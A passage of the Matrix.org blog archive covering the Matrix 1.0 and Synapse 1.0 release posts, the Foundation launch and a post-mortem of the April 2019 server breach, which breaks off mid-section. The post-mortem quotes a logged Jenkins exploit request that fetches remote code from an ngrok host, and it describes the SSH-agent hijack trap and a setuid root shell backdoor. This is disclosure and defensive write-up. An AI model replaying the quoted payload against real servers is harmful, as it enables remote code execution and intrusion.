  • Using X.509 certificates to trust servers rather than perspective notaries, to simplify and improve server-side trust. This is a breaking change across Matrix, and we’ve given the community several months now to ensure their homeservers run a valid TLS certificate. See MSC1711 for full details, and the 2 week warning we gave. As of ~9am UTC today, the matrix.org homeserver is running Synapse 1.0 and enforcing valid TLS certificates - the transition has begun (and so far we haven’t spotted any major breakage :). Thank you to everyone who got ready in advance!
  • Using .well-known URIs to discover servers, in case you can’t get a valid TLS certificate for your server’s domain.
  • Switching to room version 4 by default for creating new rooms. This fixes the most important defects that the core room algorithm has historically encountered, particularly:
  • Specifying the ability to upgrade between room versions
  • Full specification of lazy loading room members
  • Short Authentication String (Emoji!) interactive verification of E2EE devices
  • ...and lots and lots and lots of bugfixes and spec omission fixes.

That said, there is a lot of really exciting stuff in flight right now which sadly didn’t stabilise in time for Matrix 1.0, but will be landing as fast as we can finalise it now that 1.0 is at last out the door. This includes:

  • Editable messages! (These are in Synapse 1.0 and Riot already, but still stabilising so not enabled by default)
  • Reactions! (Similarly these are in develop)
  • Threading!! (We’ve planted the seeds for this in the new ‘aggregations’ support which powers edits & reactions - but full thread support is still a bit further out).
  • Cross-signed verification for end-to-end encryption (This is on a branch, but due to land any day now). We’ve also held off merging E2E backups into the Matrix 1.0 spec until cross-signing lands, given it may change the backup behaviour a bit. Once this is done, we can seriously talk about turning on E2E by default everywhere.
  • Live-tracking of room statistics and state in Synapse! (This is in Synapse 1.0 already if you check out the new room_stats and room_state tables, but we need to provide a nice admin interface for it).
  • Support for smaller footprint homeservers by reducing memory usage and stopping them from joining overly complex rooms.

Then stuff which we haven’t yet started, but is now unlocked by the 1.0 release:

  • Fixing extremities build-up (and so massively improving performance)
  • Rewriting Communities. Groups/Communities deliberately didn’t land in Matrix 1.0 as the current implementation has issues we want to fix first. MSC1772 has the details.
  • Rewritten room directory using the new room stats/state tables to be super-speedy.
  • Super-speedy incremental state resolution
  • Removing MXIDs from events (MSC1228)

Just to give a quick taster of the shape of things to come, here’s RiotX/Android, the all-new Riot client for Android, showing off Edits & Reactions in the wild…

...and here’s a screenshot of the final test jig for cross-signing devices in end-to-end encryption, so you will never have to manually verify new devices for a trusted user ever again! We demoed a very early version of this at FOSDEM, but this here is the testing harness for real deal, after several iterations of the spec and implementation to nail down the model. + means the device/user's cross-signing key is trusted, T means it's TOFU:

So, there you have it - welcome to Matrix 1.0, and we look forward to our backlog of feature work now landing!

Massive massive thanks to everyone who has stuck with the project over the years and helped support and grow Matrix - little did we think back in May 2014 that it’d take us this long to exit beta, but hopefully you’ll agree that it’s been worth it :)

Talking of which, we were looking through the photos we took from the first ever session hacking on Matrix back in May 2014…

Whiteboard 1

...suffice it to say that of the architectural options, we went with #3 in the end...

Whiteboard 2

...and that nowadays we actually know how power levels work, in excruciating and (hopefully) well-specified detail :)

There has been an absolutely enormous amount of work to pull Matrix 1.0 together - both on the spec side (thanks to the Spec Core Team for corralling proposals, and everyone who's contributed proposals, and particularly to Travis for editing it all) and the implementation side (thanks to the whole Synapse team for the tedious task of cleaning up everything that was needed for 1.0). And of course, huge thanks go to everyone who has been helping test and debug the Synapse 1.0 release candidates, or just supporting the project to get to this point :)

🔗The Matrix.org Foundation

Finally, as promised, alongside Matrix 1.0, we are very happy to announce the official launch of the finalised Matrix.org Foundation!

This has been a long-running project to ensure that Matrix’s future is governed by a neutral non-profit custodian for the benefit of everyone in the Matrix ecosystem. We started the process nearly a year ago back with the initial proposal Towards Open Governance of Matrix.org, and then legally incorporated the Foundation in October, and published the final governance proposal in January.

As of today the Foundation is finalised and operational, and all the assets for Matrix.org have been transferred from New Vector (the startup we formed in 2017 to hire the core Matrix team). In fact you may already have seen Matrix.org Foundation notices popping up all over the Matrix codebase (as all of New Vector’s work on the public Matrix codebase for the foreseeable is being assigned to the Matrix.org Foundation).

Most importantly, we’re excited to introduce the Guardians of the Matrix.org Foundation. The Guardians are the legal directors of the non-profit Foundation, and are responsible for ensuring that the Foundation (and by extension the Spec Core Team) keeps on mission and neutrally protects the development of Matrix. Guardians are typically independent of the commercial Matrix ecosystem and may even not be members of today’s Matrix community, but are deeply aligned with the mission of the project. Guardians are selected to be respected and trusted by the wider community to uphold the guiding principles of the Foundation and keep the other Guardians honest.

We have started the Foundation with five Guardians - two being the original founders of the Matrix project (Matthew and Amandine) and three being entirely independent, thus ensuring the original Matrix team forms a minority which can be kept in check by the rest of the Guardians. The new Guardians are:

  • Prof. Jon Crowcroft - Marconi Professor of Communications Systems in the Computer Lab at the University of Cambridge and the Turing Institute. Jon is a pioneer in the field of decentralised communication, and a fellow of the Royal Society, the ACM, the British Computer Society, the Institution of Engineering and Technology, the Royal Academy of Engineering and the Institute of Electrical and Electronics Engineers.

    Jon is a global expert in decentralisation and data privacy, and is excellently placed to help ensure Matrix stays true to its ideals.

  • Ross Schulman - Ross is a senior counsel and senior policy technologist at New America’s Open Technology Institute, where he focuses on internet measurement, emerging technologies, surveillance, and decentralization. Prior to joining OTI, Ross worked for Google.

    Ross brings a unique perspective as a tech- and decentralisation-savvy lawyer to the Foundation, as well as being one of the first non-developers in the Matrix community to run his own homeserver. Ross has been known to walk around Mozfest clutching a battery-powered Synapse in a box, promoting decentralised communication for all.

  • Dr. Jutta Steiner - As co-founder and CEO of Parity Technologies, Jutta is dedicated to building a better internet - Web 3.0 - where users’ privacy & control come first. Parity Technologies is a leader in the blockchain space – known to many as the creator of one of the most popular Ethereum clients, it is also the creator of two ambitious new blockchain technlogies, Polkadot and Substrate, that make it easier to experiment and innovate on scalability, encryption and governance.

    Parity has been pioneering Matrix enterprise use since the moment they decided to rely on Matrix for their internal and external communication back in 2016, and now run their own high-volume deployment, with end-to-end encryption enabled by default. Jutta represents organisations who are professionally dependent on Matrix day-to-day, as well as bringing her unique experiences around decentralisation and ensuring that Web 3.0 will be a fair web for all.

We’d like to offer a very warm welcome to the new Guardians, and thank them profusely for giving up their time to join the Foundation and help ensure Matrix stays on course for the years to come.

For the full update on the Foundation, please check out the new website content at https://matrix.org/foundation which should tell you everything you could possibly want to know about the Foundation, the Guardians, the Foundation’s legal Articles of Association, and the day-to-day Rules which define the Open Governance process.

🔗And finally…

Matrix 1.0 has been a bit of an epic to release, but puts us on a much stronger footing for the future.

However, it’s very unlikely that we’d have made it this far if most of the core dev team wasn’t able to work on Matrix as their day job. Right now we are actively looking for large-scale donations to the Matrix.org Foundation (and/or investment in New Vector) to ensure that the team can maintain as tight a focus on core Matrix work as possible, and to ensure the project realises its full potential. While Matrix is growing faster than ever, this perversely means we have more and more distractions - whether that’s keeping the Matrix.org server safe and operational, or handling support requests from the community, or helping new members of the ecosystem get up and running. If you would like Matrix to succeed, please get in touch if you’d like to sponsor work, prioritise features, get support contracts, or otherwise support the project. We’re particularly interested in sponsorship around decentralised reputation work (e.g. publishing a global room directory which users can filter based on their preferences).

Finally, huge thanks to everyone who has continued to support us through thick and thin on Patreon, Liberapay or other platforms. Every little helps here, both in terms of practically keeping the lights on, and also inspiring larger donations & financial support.

So: thank you once again for flying Matrix. We hope you enjoy 1.0, and we look forward to everything else landing on the horizon!

- Matthew, Amandine & the whole Matrix.org Team.

Synapse 1.0.0 released

11.06.2019 00:00 — General Neil Johnson

Well here it is: Synapse 1.0.

Synapse 1.0 is the reference implementation of the Matrix 1.0 spec. The goal of the release overall has been to focus on security and stability, such that we can officially declare Synapse (and Matrix) out of beta and recommended for production use. This means changing the default room protocol version used for new rooms to be v4, which includes the new state resolution algorithm, as well as collision-resistant event IDs, which are now formatted to be URL safe.

Synapse 1.0 also ships with support for the upcoming v5 room protocol (which enforces honouring server key validity periods), but this will not be used as the default for new rooms until a sufficient number of servers support it.

Please note that Synapse 1.0 does not include significant performance work or new features - our focus has been almost exclusively on providing a reference implementation of the Matrix 1.0 protocol. But having cleared our backlog on security/stability issues we will finally be now unblocked to pursue work around reducing RAM footprint, eliminating forward-extremity build up, and shipping new features like Edits, Reactions & E2E cross-signing support.

As part of the security work, Synapse 1.0 contains a breaking change that requires a valid TLS certificate on the federation API endpoint. Servers that do not configure their certificate will no longer be able to federate post 1.0.

It is also worth noting that Synapse 1.0.0 is the last release that will support Python 2.x and Postgres 9.4. For more information see here but the TL;DR is that you should upgrade asap.

This release has been a long time coming. Many thanks indeed to everyone who helped test the release candidates and provided feedback along the way.

Synapse 1.0 is just one component of a larger Matrix 1.0 release, which you can read all about here.

As ever, you can get the new update here or any of the sources mentioned at https://github.com/matrix-org/synapse. Note, Synapse is now available from PyPI, pick it up here. Also, check out our Synapse installation guide page

The changelog since 0.99.5 follows:

🔗Synapse 1.0.0 (2019-06-11)

🔗Bugfixes

  • Fix bug where attempting to send transactions with large number of EDUs can fail. (#5418)

🔗Improved Documentation

  • Expand the federation guide to include relevant content from the MSC1711 FAQ (#5419)

🔗Internal Changes

  • Move password reset links to /_matrix/client/unstable namespace. (#5424)

🔗Synapse 1.0.0rc3 (2019-06-10)

Security: Fix authentication bug introduced in 1.0.0rc1. Please upgrade to rc3 immediately

🔗Synapse 1.0.0rc2 (2019-06-10)

🔗Bugfixes

  • Remove redundant warning about key server response validation. (#5392)
  • Fix bug where old keys stored in the database with a null valid until timestamp caused all verification requests for that key to fail. (#5415)
  • Fix excessive memory using with default federation_verify_certificates: true configuration. (#5417)

🔗Synapse 1.0.0rc1 (2019-06-07)

🔗Features

  • Synapse now more efficiently collates room statistics. (#4338, #5260, #5324)
  • Add experimental support for relations (aka reactions and edits). (#5220)
  • Ability to configure default room version. (#5223, #5249)
  • Allow configuring a range for the account validity startup job. (#5276)
  • CAS login will now hit the r0 API, not the deprecated v1 one. (#5286)
  • Validate federation server TLS certificates by default (implements MSC1711). (#5359)
  • Update /_matrix/client/versions to reference support for r0.5.0. (#5360)
  • Add a script to generate new signing-key files. (#5361)
  • Update upgrade and installation guides ahead of 1.0. (#5371)
  • Replace the perspectives configuration section with trusted_key_servers, and make validating the signatures on responses optional (since TLS will do this job for us). (#5374)
  • Add ability to perform password reset via email without trusting the identity server. (#5377)
  • Set default room version to v4. (#5379)

🔗Bugfixes

  • Fixes client-server API not sending "m.heroes" to lazy-load /sync requests when a rooms name or its canonical alias are empty. Thanks to @dnaf for this work! (#5089)
  • Prevent federation device list updates breaking when processing multiple updates at once. (#5156)
  • Fix worker registration bug caused by ClientReaderSlavedStore being unable to see get_profileinfo. (#5200)
  • Fix race when backfilling in rooms with worker mode. (#5221)
  • Fix appservice timestamp massaging. (#5233)
  • Ensure that server_keys fetched via a notary server are correctly signed. (#5251)
  • Show the correct error when logging out and access token is missing. (#5256)
  • Fix error code when there is an invalid parameter on /_matrix/client/r0/publicRooms (#5257)
  • Fix error when downloading thumbnail with missing width/height parameter. (#5258)
  • Fix schema update for account validity. (#5268)
  • Fix bug where we leaked extremities when we soft failed events, leading to performance degradation. (#5274, #5278, #5291)
  • Fix "db txn 'update_presence' from sentinel context" log messages. (#5275)
  • Fix dropped logcontexts during high outbound traffic. (#5277)
  • Fix a bug where it is not possible to get events in the federation format with the request GET /_matrix/client/r0/rooms/{roomId}/messages. (#5293)
  • Fix performance problems with the rooms stats background update. (#5294)
  • Fix noisy 'no key for server' logs. (#5300)
  • Fix bug where a notary server would sometimes forget old keys. (#5307)
  • Prevent users from setting huge displaynames and avatar URLs. (#5309)
  • Fix handling of failures when processing incoming events where calling /event_auth on remote server fails. (#5317)
  • Ensure that we have an up-to-date copy of the signing key when validating incoming federation requests. (#5321)
  • Fix various problems which made the signing-key notary server time out for some requests. (#5333)
  • Fix bug which would make certain operations (such as room joins) block for 20 minutes while attemoting to fetch verification keys. (#5334)
  • Fix a bug where we could rapidly mark a server as unreachable even though it was only down for a few minutes. (#5335, #5340)
  • Fix a bug where account validity renewal emails could only be sent when email notifs were enabled. (#5341)
  • Fix failure when fetching batches of events during backfill, etc. (#5342)
  • Add a new room version where the timestamps on events are checked against the validity periods on signing keys. (#5348, #5354)
  • Fix room stats and presence background updates to correctly handle missing events. (#5352)
  • Include left members in room summaries' heroes. (#5355)
  • Fix federation_custom_ca_list configuration option. (#5362)
  • Fix missing logcontext warnings on shutdown. (#5369)

🔗Improved Documentation

  • Fix docs on resetting the user directory. (#5282)
  • Fix notes about ACME in the MSC1711 faq. (#5357)

🔗Internal Changes

  • Synapse will now serve the experimental "room complexity" API endpoint. (#5216)
  • The base classes for the v1 and v2_alpha REST APIs have been unified. (#5226, #5328)
  • Simplifications and comments in do_auth. (#5227)
  • Remove urllib3 pin as requests 2.22.0 has been released supporting urllib3 1.25.2. (#5230)
  • Preparatory work for key-validity features. (#5232, #5234, #5235, #5236, #5237, #5244, #5250, #5296, #5299, #5343, #5347, #5356)
  • Specify the type of reCAPTCHA key to use. (#5283)
  • Improve sample config for monthly active user blocking. (#5284)
  • Remove spurious debug from MatrixFederationHttpClient.get_json. (#5287)
  • Improve logging for logcontext leaks. (#5288)
  • Clarify that the admin change password API logs the user out. (#5303)
  • New installs will now use the v54 full schema, rather than the full schema v14 and applying incremental updates to v54. (#5320)
  • Improve docstrings on MatrixFederationClient. (#5332)
  • Clean up FederationClient.get_events for clarity. (#5344)
  • Various improvements to debug logging. (#5353)
  • Don't run CI build checks until sample config check has passed. (#5370)
  • Automatically retry buildkite builds (max twice) when an agent is lost. (#5380)

Final countdown to 1.0

24.05.2019 00:00 — General Matthew Hodgson

Hi all,

After lots of refinements, polishing and a few distractions we’re finally at the point of announcing the final timeline for both Matrix 1.0 and Synapse 1.0! We are targeting Monday 10th June as our release date - please consider this your two week warning!

This is the end game of the process we began back in February when we released the first stable release of the Server-Server API at FOSDEM, and started the Synapse 0.99 release series to prepare for 1.0.

Matrix 1.0 refers to the upcoming set of API releases which provides a matched set of stable and secure APIs across all of Matrix - at which point the project (at last) exits beta! In practice, this will be Client-Server API 0.5 (including final membership lazy loading, E2E backups and interactive verification and lots more), SS API 0.2 (including server key validity period fixes and associated v5 room protocol) and any other spec updates. The next 2 weeks will see a flurry of spec activity as we get everything together - you can see the full list and track the progress for the CS 0.5 spec release at https://github.com/matrix-org/matrix-doc/projects/2.

Meanwhile, Synapse 1.0 will be the reference implementation of Matrix 1.0, and so makes the changes required to implement Matrix 1.0 and close all currently known security and stability issues and thus exit beta. This means changing the default room protocol version used for new rooms to be v4, which includes the new state resolution algorithm, as well as collision-resistant event IDs, which are now formatted to be URL safe. Support for v4 rooms shipped in Synapse 0.99.5.1, so please upgrade asap to 0.99.5.1 before 1.0 is released to ease the transition.. Synapse 1.0 will also ship with support for the upcoming v5 room protocol (which enforces honouring server key validity periods), but this will not used as the default for new rooms until sufficient servers are speaking Matrix 1.0.

As part of the security work, Matrix 1.0 and Synapse 1.0 also contains a breaking change that requires a valid TLS certificate on the federation API endpoint. Servers that do not configure their certificate will no longer be able to federate post 1.0

You can check that your server has been correctly configured here and see here for more info on what you need to do. If in doubt head to #synapse:matrix.org.

We've been tracking readiness for the certificate change at https://arewereadyyet.com, at the time of writing 68% of active servers on the federation have valid certificates. We obviously would want that number to be higher, however since the largest installations have upgraded the total number of users who are ready for 1.0 stands at 96%, which we consider to be high enough to release 1.0.

This is not a drill, from here until 10th June we need everyone to not only ensure that their own server is ready, but also to encourage their fellow admins to update as well. With your help we can get everyone over the line!

Thanks everyone for your help to date, especially those providing support in #synapse:matrix.org.

Onwards!

Post-mortem and remediations for Apr 11 security incident

08.05.2019 00:00 — General Matthew Hodgson

🔗Table of contents

🔗Introduction

Hi all,

On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.

Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network itself was not impacted. This is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this incident), but this incident was not related to the protocol.

Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.

In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.

This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)

Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.

Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.

🔗History

Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services runs across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.

The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we span up a bunch of vanilla Debian boxes on UpCloud, and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.

In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations - for instance, the default image allows root access via SSH and allows SSH agent forwarding, and the config wasn’t tweaked. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d be easily able to get it right in future once we fixed up the hosts with proper configuration management etc.

Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.

Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).

Good news was that funding meant that in March 2018 we were able to hire a fulltime ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team. Firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).

So we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter; whose configuration is managed exclusively by Ansible, and have sensible SSH configs which disallow root login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we simply failed to prioritise getting back to fix them.

🔗The Incident

The first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via DM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an adhoc basis, and we had indeed missed the security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr 10th we updated the Jenkins and investigated to see if any vulnerabilities had been exploited.

In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This was suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1->SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.

At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:

matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"

  • This allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous integration testing of Riot/iOS and Riot/Android). The attacker put an SSH key on the box, which was unfortunately exposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which waited for any user to SSH into the jenkins user, which would then hijack any available forwarded SSH keys to try to add the attacker’s SSH key to root@ on as many other hosts as possible.
  • On Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some admin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap, and resulted in the majority of the malicious keys being inserted to the remote hosts.
  • From this point on, the attacker proceeded to explore the network, performing targeted exfiltration of data (e.g. our passbolt database, which is thankfully end-to-end encrypted via GPG) seemingly targeting credentials and data for use in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot).
  • The majority of access to the hosts occurred between Apr 4th and 6th.
  • There was no evidence of large-scale data exfiltration, based on analysing network logs.
  • There was no evidence of Modular.im hosts having been compromised. (Modular’s provisioning system and DB did run on the old infrastructure, but it was not used to tamper with the modular instances themselves).
  • There was no evidence of the identity server databases having been compromised.
  • There was no evidence of tampering in our source code repositories.
  • There was no evidence of tampering of our distributed software packages.
  • Two more hosts were compromised on Apr 5th by similarly hijacking another developer SSH agent as the dev logged into a production server.

By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.

We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts, and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards).

Given the production database had been accessed, we had no choice but drop all access_tokens for matrix.org, to stop the attacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.

At about 4am we had enough of the bare necessities back up and running to pause for sleep.

🔗The Defacement

At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).

On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...

Cloudflare login UI

...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.

Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.

To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.

🔗The Rebuild

The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:

  • Access via SSH restricted as heavily as possible
  • SSH agent forwarding disabled server-side
  • All configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.

Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing with securer alternatives if needed, even if it slowed down the rebuild. Particularly, this meant:

  • Jenkins has been replaced by Buildkite
  • Wordpress has been replaced by static generated sites (e.g. Gatsby)
  • cgit has been replaced by gitlab.
  • Entirely new packaging building, signing & distribution infrastructure (more on that later)
  • etc.

Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.

In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:

Service status

Apologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.

🔗Remediations

Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.

We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.

We should also acknowledge that after being removed from the infra, the attacker chose to file a set of Github issues on Apr 12 to highlight some of the security issues that had taken advantage of during the breach. Their actions matched the findings from our forensics on Apr 10, and their suggested remediations aligned with our plan.

We’ve split the remediation work into the following domains.

🔗SSH

Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:

🔗SSH agent forwarding should be disabled.

SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.

The common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For instance, Github’s guide to using SSH agent forwarding says:

Warning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding

As a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs, thinking “well, what can we trust if not our own servers?”

This was a massive, massive mistake.

If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is someone to have snuck malicious code on your server waiting for you to log in with a forwarded agent, and boom, even if it was just a one-off ssh -A.

Our remediations for this are:

  • Disable all ssh agent forwarding on the servers.
  • If you need to jump through a box to ssh into another box, use ssh -J $host.
  • This can also be used with rsync via rsync -e "ssh -J $host"
  • If you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly recommends using more modern protocols than scp).
  • If you need to regularly copy stuff from server to another (or use SSH to GitHub to check out something from a private repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able to perform limited actions.
  • If you just need to check out stuff from public git repos, use https rather than git+ssh.
  • Try to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can at least be a horrible warning...

Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.

🔗SSH should not be exposed to the general internet

Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to dev network, and then SSH bastion hosts to be the only access point into production, using SSH keys to restrict access to be as minimal as possible.

🔗SSH keys should give minimal access

